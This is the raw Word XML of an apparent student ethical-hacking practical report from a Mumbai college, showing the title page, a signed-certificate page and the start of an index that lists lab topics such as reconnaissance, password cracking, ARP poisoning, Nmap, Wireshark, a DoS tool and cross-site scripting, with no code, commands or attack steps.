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108A" w14:textId="226D491C" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
        <w:ind w:left="2053" w:right="2035"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>PRACTICAL REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A96876" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="183" w:line="362" w:lineRule="auto"/>
        <w:ind w:left="2053" w:right="2036"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Submitted in partial fulfilment of the Requirements for the award of the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081920C1" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="4"/>
        <w:ind w:left="426" w:right="405"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>THIRD YEAR BACHELOR OF SCIENCE (COMPUTER SCIENCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470A5432" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="161"/>
        <w:ind w:left="2053" w:right="2033"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724CD1F6" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="166" w:line="362" w:lineRule="auto"/>
        <w:ind w:right="3218"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                   KHAN ZIAULHAQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081FB55E" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="166" w:line="362" w:lineRule="auto"/>
        <w:ind w:left="3240" w:right="3218" w:hanging="4"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SEAT NUMBER: 39028</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F5473" w14:textId="2B412BB7" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E079711" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043B5879" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr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837440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EB7394E" wp14:editId="461E20D4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3133344</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>155135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1308326" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1026" name="image1.jpeg" descr="C:\Users\msc\Desktop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0832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DBFA5" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516E04CB" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="193"/>
        <w:ind w:left="2053" w:right="2039"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>DEPARTMENT OF COMPUTER SCIENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAB04C" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090A1134" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="882" w:right="85" w:hanging="550"/>
      </w:pPr>
      <w:r>
        <w:t>N.R SWAMY COLLEGE OF COMMERCE &amp; ECONOMICS AND SMT. THIRUMALAI COLLEGE OF SCIENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B97D217" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="482" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(AUTONOMOUS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242B734" w14:textId="5663896D" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="482" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr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>MAHARASHTRA, MUMBAI - 400031 2023 – 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439BF4BD" w14:textId="16947E6C" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="482" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C2B4EC" w14:textId="5875174D" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="482" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0BC28F" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="482" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="005824E8" w:rsidSect="00C34A61">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1580" w:right="1360" w:bottom="280" w:left="13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2B016CB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02BDAD71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6D3AA743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27A89719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55470A4F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1DEAC2F9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716669A0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3CC660FB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35B54702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3C46B935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3780128E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08DA1DD6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2D8E6217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6B8E9FEC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1523BBAE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0AF33256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2F87250C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0395869A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3A623562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11AF2311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1B1AB128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350110F5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6B7D4D6C" w14:textId="11F327FC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3851B5CE" w14:textId="77777777" w:rsidR="00C34A61" w:rsidRDefault="00C34A61" w:rsidP="005824E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201" w:line="264" w:lineRule="auto"/>
        <w:ind w:right="85"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6016329F" w14:textId="77777777" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7" w:rsidP="005824E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201" w:line="264" w:lineRule="auto"/>
        <w:ind w:right="85"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EF847A" w14:textId="65B807F5" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201" w:line="264" w:lineRule="auto"/>
        <w:ind w:right="85"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>N.R SWAMY COLLEGE OF COMMERCE AND ECONOMICS &amp; SMT. THIRUMALAI COLLEGE OF SCIENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16950511" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="268" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(AUTONOMOUS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9F4E5" w14:textId="61B5CD62" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="268" w:lineRule="auto"/>
        <w:ind w:left="2334" w:right="2310" w:hanging="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>MAHARASHTRA, MUMBAI - 400031 2023 – 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D55D57" w14:textId="39C3621B" w:rsidR="005824E8" w:rsidRPr="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="6"/>
        <w:ind w:left="2053" w:right="2039"/>
        <w:jc w:val="center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838464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CDE4766" wp14:editId="030B363C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>373174</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1115988" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1027" name="image1.jpeg" descr="C:\Users\msc\Desktop\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1598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DEPARTMENT OF COMPUTER SCIENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A8A81" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C503DAD" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2053" w:right="2033"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>CERTIFICATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5ABBE8" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b w:val="0"/>
          <w:sz w:val="47"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53986AFD" w14:textId="57784F8F" w:rsidR="005824E8" w:rsidRPr="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="110" w:right="255" w:hanging="10"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">This is to certify that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Practicals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> of  ETHICAL HACKING is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>bonafied</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> work of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>KHAN ZIAULHAQ MOHD IBRAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">bearing Seat No. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>39028</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> submitted in partial fulfilment of the requirements for the award of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">THIRD YEAR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">BACHELOR OF SCIENCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">COMPUTER SCIENCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>from University of Mumbai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D557D" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8833A2" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0001EDAB" w14:textId="2E11DE41" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650762EE" w14:textId="2BA3D2C1" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      ________________________                                                        ____________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B2BF0" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">      Professor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Charge                                                 Head Of Department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158177F9" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298B85C8" w14:textId="0287F5FA" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6898193A" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0CC287" w14:textId="2B9B45AA" w:rsidR="005824E8" w:rsidRPr="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005824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5824E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="005824E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">____________________                                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r w:rsidRPr="005824E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> _____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F8392" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8" w:rsidP="005824E8">
      <w:pPr>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">       Internal Examiner                                                        External Examiner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFA85B" w14:textId="77777777" w:rsidR="005824E8" w:rsidRDefault="005824E8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46DA6322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0D070FF1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02AEDC0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08ABE419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7264FE0B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3F04EDE6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522ECFA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0ABBFDF3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4166CD7D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73558EA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6A82474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1598F16E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41E4691F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6B8A7A8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44552A71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37B84A3C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2DDFEC9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1AD8A1D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4F6AC02B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A46A868" w14:textId="7BAD194E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381EA006" w14:textId="31B86FB6" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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0436C2D2" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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257AAF25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7D4A57A6" w14:textId="77777777" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7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1F443BED" w14:textId="7F8A7228" w:rsidR="00EC2D41" w:rsidRPr="00B469D5" w:rsidRDefault="00EC2D41" w:rsidP="00EC2D4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B469D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>INDEX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BBB2DD" w14:textId="77777777" w:rsidR="00EC2D41" w:rsidRPr="00C109B5" w:rsidRDefault="00EC2D41" w:rsidP="00EC2D4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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8748" w:type="dxa"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="672"/>
        <w:gridCol w:w="111"/>
        <w:gridCol w:w="4907"/>
        <w:gridCol w:w="1348"/>
        <w:gridCol w:w="1619"/>
        <w:gridCol w:w="91"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E2B58" w:rsidRPr="00C109B5" w14:paraId="1F46FBDB" w14:textId="77777777" w:rsidTr="006E2B58">
        <w:trPr>
          <w:trHeight w:val="1008"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="085AE85D" w14:textId="77777777" w:rsidR="006E2B58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16C991DE" w14:textId="078B5C27" w:rsidR="006E2B58" w:rsidRPr="00AE301A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E301A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SR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEDB35C" w14:textId="32FEC3C3" w:rsidR="006E2B58" w:rsidRPr="00AE301A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E301A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NO.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5018" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="2B146CBB" w14:textId="77777777" w:rsidR="006E2B58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3306B5BA" w14:textId="2290E0FF" w:rsidR="006E2B58" w:rsidRPr="00AE301A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E301A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PRACTICALS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1348" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="761B27D9" w14:textId="77777777" w:rsidR="006E2B58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23766A3A" w14:textId="6D1913D8" w:rsidR="006E2B58" w:rsidRPr="00AE301A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E301A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DATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1CFC14D0" w14:textId="77777777" w:rsidR="006E2B58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</w:p>
          <w:p w14:paraId="10D5FBC1" w14:textId="0AD4B3A2" w:rsidR="006E2B58" w:rsidRPr="00AE301A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E301A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SIGN /</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C27D5EE" w14:textId="236F7FED" w:rsidR="006E2B58" w:rsidRPr="00AE301A" w:rsidRDefault="006E2B58" w:rsidP="00AB66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E301A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REMARK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E2B58" w:rsidRPr="00C109B5" w14:paraId="7A05F06B" w14:textId="56D2478A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78238FDC" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00B469D5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4C2C8685" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00B469D5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43DCACF8" w14:textId="656C77DB" w:rsidR="006E2B58" w:rsidRPr="00B469D5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5C0F6C25" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00B469D5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6E2B58" w:rsidRPr="00C109B5" w14:paraId="6AFABB4B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7CF07229" w14:textId="17A61A71" w:rsidR="006E2B58" w:rsidRPr="002228B1" w:rsidRDefault="006E2B58" w:rsidP="002228B1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3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2F588655" w14:textId="528CC0D9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ogle and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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ois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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connaissance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2263308" w14:textId="6FB99108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3E80B709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4B55E5DE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3F3A54DE" w14:textId="00A968FC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3BD692E7" w14:textId="1501B30F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Password Encryption and Decryption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31CE81FC" w14:textId="6DB9AAED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5A5D60C2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15E26220" w14:textId="77777777" w:rsidTr="006E2B58">
        <w:trPr>
          <w:trHeight w:val="864"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E1AB716" w14:textId="6266110F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61EEC0D3" w14:textId="11C5BD39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Password Cracking and Wireless Network Password Decoding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1F6845FB" w14:textId="1DE74EB3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E51742A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6A5DCD72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5194FF24" w14:textId="2830E25B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5C0CDC12" w14:textId="36ED841E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Linux Network Analysis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4639021" w14:textId="008E25D1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2A9D29EA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77EF1A6B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0C8E5FE6" w14:textId="22AEA70B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4D019F7E" w14:textId="320E20C3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ARP Poisoning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25093AB" w14:textId="5DC408E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83DDA5D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5F64A8F4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59DFD1B1" w14:textId="5858CC36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7A7C5767" w14:textId="3C2816B0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</w:rPr>
              <w:t xml:space="preserve">Port Scanning with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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NMap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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F31FE09" w14:textId="57FACB01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0BEB5D3D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3A3314E8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099D6287" w14:textId="2F1044F4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75D9794E" w14:textId="2D48F8C8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Network Traffic Capture</w:t>
            </w:r>
            <w:r w:rsidR="0093196F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Using Wireshark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330FA23E" w14:textId="48F28563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9CFF691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0AC6D925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5EF30E00" w14:textId="7F055D30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2D6D03EC" w14:textId="44A12346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Denial of Service (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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) Attack</w:t>
            </w:r>
            <w:r w:rsidR="0093196F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Using  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0093196F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nemesy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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4A3C3A1E" w14:textId="6DD88460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038E7262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1B0BEFFC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55EA9475" w14:textId="01F4161C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234E2811" w14:textId="18200D74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</w:rPr>
              <w:t>Persistent Cross-Site Scripting Attack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863ECAB" w14:textId="02E23ACC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C7B2373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7FF7D070" w14:textId="77777777" w:rsidTr="006E2B58">
        <w:trPr>
          <w:trHeight w:val="864"/>
        </w:trPr>
        <w:tc>
